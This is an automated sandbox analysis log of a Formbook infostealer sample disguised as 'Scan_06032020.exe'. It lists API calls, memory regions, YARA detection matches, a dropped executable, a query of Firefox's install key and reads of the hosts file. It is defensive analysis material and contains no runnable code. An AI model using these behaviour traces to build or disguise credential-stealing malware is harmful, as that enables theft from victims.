          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A4A0 NtUnmapViewOfSection,6_2_0343A4A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79A10 NtAllocateVirtualMemory,6_2_02E79A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E798E0 NtReadFile,6_2_02E798E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79830 NtCreateFile,6_2_02E79830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79960 NtClose,6_2_02E79960
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E798DA NtReadFile,6_2_02E798DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7982A NtCreateFile,6_2_02E7982A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7995B NtClose,6_2_02E7995B
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419830 NtCreateFile,17_2_00419830
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_004198E0 NtReadFile,17_2_004198E0
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419960 NtClose,17_2_00419960
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419A10 NtAllocateVirtualMemory,17_2_00419A10
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041982A NtCreateFile,17_2_0041982A
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_004198DA NtReadFile,17_2_004198DA
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041995B NtClose,17_2_0041995B
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010122080_2_01012208
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010104720_2_01010472
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01010FC00_2_01010FC0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010131100_2_01013110
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010118390_2_01011839
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01014B800_2_01014B80
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01014B900_2_01014B90
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01010F2C0_2_01010F2C
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01012FCE0_2_01012FCE
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010151D80_2_010151D8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010151E80_2_010151E8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010130A90_2_010130A9
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010130BC0_2_010130BC
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010153F80_2_010153F8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010154080_2_01015408
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0101F7F00_2_0101F7F0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010156A00_2_010156A0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010156B00_2_010156B0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01013F790_2_01013F79
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01013F880_2_01013F88
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_09DDF7980_2_09DDF798
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_09DDF78A0_2_09DDF78A
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C41510_2_0B1C4151
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C30D80_2_0B1C30D8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C26500_2_0B1C2650
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C44900_2_0B1C4490
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C42070_2_0B1C4207
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C310D0_2_0B1C310D
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C10300_2_0B1C1030
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C10200_2_0B1C1020
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C30C90_2_0B1C30C9
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041D9C84_2_0041D9C8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041DEEC4_2_0041DEEC
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00409F5B4_2_00409F5B
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00409F604_2_00409F60
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0341FB406_2_0341FB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034263C26_2_034263C2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424B966_2_03424B96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_033FEBE06_2_033FEBE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424A5B6_2_03424A5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B0A026_2_034B0A02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034CE2146_2_034CE214
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342523D6_2_0342523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C22DD6_2_034C22DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1A996_2_034C1A99
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034142B06_2_034142B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342594B6_2_0342594B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034499066_2_03449906
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034271106_2_03427110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B61DF6_2_034B61DF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C19E26_2_034C19E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034261806_2_03426180
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034CD9BE6_2_034CD9BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034210706_2_03421070
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034298106_2_03429810
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BD0166_2_034BD016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342E0206_2_0342E020
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034200216_2_03420021
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034248CB6_2_034248CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C28E86_2_034C28E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0340A0806_2_0340A080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034A18B66_2_034A18B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C17466_2_034C1746
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1FCE6_2_034C1FCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B27826_2_034B2782
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034157906_2_03415790
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034176406_2_03417640
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424E616_2_03424E61
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BCE666_2_034BCE66
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03425E706_2_03425E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034266116_2_03426611
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C26F86_2_034C26F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B3E966_2_034B3E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B1D1B6_2_034B1D1B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C25196_2_034C2519
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034115306_2_03411530
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0349C53F6_2_0349C53F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_033F0D406_2_033F0D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034AFDDB6_2_034AFDDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BD5D26_2_034BD5D2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034A1DE36_2_034A1DE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0349E58A6_2_0349E58A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BE5816_2_034BE581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342547E6_2_0342547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0340740C6_2_0340740C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034114106_2_03411410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034AF42B6_2_034AF42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BDCC56_2_034BDCC5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B44EF6_2_034B44EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1C9F6_2_034C1C9F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C2C9A6_2_034C2C9A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B34906_2_034B3490
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7D9C86_2_02E7D9C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7DEEC6_2_02E7DEEC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62FB06_2_02E62FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F606_2_02E69F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F5B6_2_02E69F5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D896_2_02E62D89
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D906_2_02E62D90
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0A05F79816_2_0A05F798
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0A05F79716_2_0A05F797
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44415116_2_0B444151
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B4430D816_2_0B4430D8
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44265016_2_0B442650
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44449016_2_0B444490
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44420716_2_0B444207
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44310D16_2_0B44310D
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44102016_2_0B441020
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44103016_2_0B441030
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B4430C916_2_0B4430C9
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0040103017_2_00401030
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041D9C817_2_0041D9C8
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D8917_2_00402D89
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D9017_2_00402D90
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041DEEC17_2_0041DEEC
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F5B17_2_00409F5B
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F6017_2_00409F60
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402FB017_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03485110 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0344DDE8 appears 43 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 033FB0E0 appears 176 times
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.555559475.00000000006C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.565029549.000000000B130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000000.528970707.0000000000652000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551467733.00000000003E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551670785.0000000000452000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552652444.00000000001B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552510795.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.606369972.0000000001C9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554340459.0000000000EA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554197147.0000000000E32000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: comsvcs.dllJump to behavior
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: Scan_06032020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ufipp6ljxlz.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/8@9/4
          Source: C:\Users\user\Desktop\Scan_06032020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_06032020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Qor0xv4iJump to behavior
          Source: Scan_06032020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scan_06032020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Scan_06032020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Scan_06032020.exeVirustotal: Detection: 16%
